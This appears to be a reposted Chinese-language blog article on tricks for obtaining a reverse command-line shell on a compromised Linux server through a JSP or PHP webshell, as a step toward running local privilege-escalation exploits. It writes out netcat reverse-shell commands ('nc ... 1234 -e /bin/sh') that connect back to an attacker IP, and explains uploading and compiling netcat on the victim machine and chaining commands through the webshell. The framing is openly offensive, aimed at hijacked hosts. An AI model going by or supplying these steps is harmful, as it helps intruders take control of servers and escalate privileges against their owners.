溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Linux下反彈CmdLine Shell小技巧有哪些

發(fā)布時(shí)間:2021-10-27 10:36:40 來(lái)源:億速云 閱讀:129 作者:小新 欄目:系統(tǒng)運(yùn)維

這篇文章主要為大家展示了“Linux下反彈CmdLine Shell小技巧有哪些”,內(nèi)容簡(jiǎn)而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓小編帶領(lǐng)大家一起研究并學(xué)習(xí)一下“Linux下反彈CmdLine Shell小技巧有哪些”這篇文章吧。

Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是我們的EXP必須在可交互環(huán)境運(yùn)行,否則如果直接在WebShell執(zhí)行,即使能提權(quán)成功,我們也沒(méi)法利用到。所以我們需要先反彈一個(gè)CmdLine Shell回來(lái)(直接說(shuō)成CmdShell怕人誤解...因?yàn)閃in有個(gè)cmd.exe ^_^),然后在命令行終端下執(zhí)行EXP進(jìn)行提權(quán)。

一般情況下,絕大多數(shù)人都會(huì)通過(guò)PHP WebShell的Back Connect功能彈回一個(gè)Shell,但是有時(shí)候會(huì)碰到服務(wù)器不支持PHP或者WebShell沒(méi)法反彈的情況,比如這兩天朋友給我的一個(gè)JSPShell所在服務(wù)器只支持JSP,不支持PHP。這時(shí)候,我們經(jīng)典的netcat就可以派上用場(chǎng)了。

平時(shí)在Windows下做事的時(shí)候,在必要的情況下我們可以先在本機(jī)運(yùn)行nc -vv -lp 1234監(jiān)聽端口,然后在肉雞上nc 12.21.12.21 1234 -e cmd.exe給我們反彈一個(gè)CmdShell,這個(gè)方法在Linux仍然可行。

在本機(jī)監(jiān)聽后,在WebShell運(yùn)行nc 12.21.12.21 1234 -e /bin/sh就能彈一個(gè)CmdLine Shell給我們。

但我們經(jīng)常碰到的情況并不都是這么100%順利的,像昨晚整的那兩臺(tái),每臺(tái)都是不能直接執(zhí)行nc的。一臺(tái)有nc,但執(zhí)行從是不起作用,另外一臺(tái)直接壓根就沒(méi)有nc....

不過(guò),這個(gè)難不倒我們,我們可以給他裝一個(gè)嘛,比較快捷的方法是,我們可以到http://netcat.sourceforge.net/download.php下載nc的源碼,先在我們自己linux機(jī)器上編譯好以后把bin文件傳上去(我開始傳的我的Debian自帶的netcat,結(jié)果仍然不能運(yùn)行....)。如果還不行,那就把源碼傳上去,在目標(biāo)機(jī)器上直接編譯。

昨晚那兩臺(tái)機(jī)器,一臺(tái)我是直接傳的本地編譯后的,一臺(tái)是在目標(biāo)機(jī)器上編譯的。如果直接傳的nc可以運(yùn)行的話還比較好說(shuō),如果需要在目標(biāo)機(jī)器上編譯的話,這里有點(diǎn)小技巧:

因?yàn)樵诘玫紺mdLine Shell前,我們只能在WebShell里執(zhí)行命令,一般每次只能執(zhí)行一條,然后等回顯。假如我們的WebShell在/var/www/site目錄,那么我們每次執(zhí)行命令默認(rèn)的當(dāng)前路徑都是/var/www/site,而我們的netcat源碼包解壓在了/tmp/netcatsrc文件夾,這樣的話,我們編譯netcat的時(shí)候,configure還好說(shuō),可用/tmp/netcatsrc/configure命令,但下一步make的時(shí)候就不行了,因?yàn)楫?dāng)前路徑是/var/www/site,而不是我們想要的/tmp/netcatsrc/,所以我們configure完了make的時(shí)候會(huì)報(bào)錯(cuò)。

解決這個(gè)問(wèn)題其實(shí)也很簡(jiǎn)單,可以直接把兩句寫成一句就可以:cd /tmp/netcatsrc;make

用分號(hào)隔開寫,把make跟在目錄切換命令后面,這樣編譯的時(shí)候就不會(huì)報(bào)錯(cuò)了。

在還沒(méi)有得到CmdLine Shell的時(shí)候,這樣的寫法還是很有用的。

以上是“Linux下反彈CmdLine Shell小技巧有哪些”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對(duì)大家有所幫助,如果還想學(xué)習(xí)更多知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI